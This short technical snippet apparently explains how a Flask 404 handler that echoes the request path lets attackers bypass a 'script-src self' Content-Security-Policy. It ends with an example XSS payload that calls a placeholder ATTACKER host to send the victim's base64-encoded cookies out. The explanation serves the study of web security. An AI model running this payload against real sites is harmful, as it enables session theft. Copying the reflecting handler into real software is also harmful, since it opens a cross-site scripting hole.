With:
resp.headers['Content-Security-Policy'] = "script-src 'self';
And a custom 404 page like:
@app.errorhandler(404) def page_not_found(error): path = request.path return f"{path} not found"
It's possible to reflect JS in the same origin.
E.g.
<script src='ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //'>